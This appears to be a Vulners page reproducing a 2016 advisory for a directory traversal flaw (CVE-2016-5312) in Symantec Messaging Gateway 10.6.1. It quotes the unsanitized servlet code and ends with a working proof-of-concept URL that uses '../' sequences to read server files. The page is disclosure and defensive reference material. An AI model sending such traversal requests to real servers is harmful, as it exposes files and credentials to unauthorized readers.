Vulners
Lucene search
Symantec Messaging Gateway 10.6.1 - Directory Traversal
| Reporter | Title | Published | Views | Family All 13 |
|---|---|---|---|---|
 | Symantec Messaging Gateway 10.6.1 - Directory Traversal | 28 Sep 201600:00 | – | zdt |
 | Symantec Messaging Gateway Directory Traversal Vulnerability | 28 Sep 201600:00 | – | cnvd |
 | CVE-2016-5312 | 14 Apr 201718:00 | – | cve |
 | CVE-2016-5312 | 14 Apr 201718:00 | – | cvelist |
 | Symantec Messaging Gateway 10.6.1 File Disclosure | 7 Jul 201800:00 | – | dsquare |
 | Symantec Messaging Gateway 10.6.1 - Directory Traversal | 28 Sep 201600:00 | – | exploitpack |
 | CVE-2016-5312 | 14 Apr 201718:59 | – | nvd |
 | Symantec Messaging Gateway Directory Traversal Vulnerability (SYM16-016) - Active Check | 30 Sep 201600:00 | – | openvas |
 | CVE-2016-5312 | 14 Apr 201718:59 | – | osv |
 | Symantec Messaging Gateway 10.6.1 Directory Traversal | 28 Sep 201600:00 | – | packetstorm |
10
# Title : Symantec Messaging Gateway <= 10.6.1 Directory Traversal
# Date : 28/09/2016
# Author : R-73eN
# Tested on : Symantec Messaging Gateway 10.6.1 (Latest)
# Software : https://www.symantec.com/products/threat-protection/messaging-gateway
# Vendor : Symantec
# CVE : CVE-2016-5312
# Vendor Advisory and Fix: https://www.symantec.com/security_response/securityupdates/detail.jsp?fid=security_advisory&pvid=security_advisory&year=&suid=20160927_00
#
# ___ __ ____ _ _
# |_ _|_ __ / _| ___ / ___| ___ _ __ / \ | |
# | || '_ \| |_ / _ \| | _ / _ \ '_ \ / _ \ | |
# | || | | | _| (_) | |_| | __/ | | | / ___ \| |___
# |___|_| |_|_| \___/ \____|\___|_| |_| /_/ \_\_____|
#
#
# DESCRIPTION:
#
# A charting component in the Symantec Messaging Gateway control center does not properly sanitize user input submitted for charting requests.
# This could potentially result in an authorized but less privileged user gaining access to paths outside the authorized directory.
# This could potentially provide read access to some files/directories on the server for which the user is not authorized.
#
The problem relies in the package kavachart-kcServlet-5.3.2.jar , File : com/ve/kavachart/servlet/ChartStream.java
The vulnerable code is
extends HttpServlet {
public void doGet(HttpServletRequest httpServletRequest, HttpServletResponse httpServletResponse) {
block6 : {
try {
String string = httpServletRequest.getParameter("sn");
//**** Taking parameter "sn" and writing it to the "string variable"
if (string == null) break block6;
String string2 = string.substring(string.length() - 3);
byte[] arrby = (byte[])this.getServletContext().getAttribute(string);
//**** The string variable is passed here without any sanitanization for directory traversal
//**** and you can successfully use this to do a directory traversal.
if (arrby != null) {
httpServletResponse.setContentType("image/" + string2);
ServletOutputStream servletOutputStream = httpServletResponse.getOutputStream();
httpServletResponse.setContentLength(arrby.length);
servletOutputStream.write(arrby);
this.getServletContext().removeAttribute(string);
break block6;
}
POC:
https://IP-address:PORT/brightmail/servlet/com.ve.kavachart.servlet.ChartStream?sn=../../WEB-INF/libData
Build on a solid foundation with Vulners data
We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data
Api
Power your application with Vulners API
The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access
App
Assess and manage vulnerabilities with Vulners tools
Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation
28 Sep 2016 00:00Current
6Medium risk
Vulners AI Score6
CVSS 24
CVSS 36.5
EPSS0.40029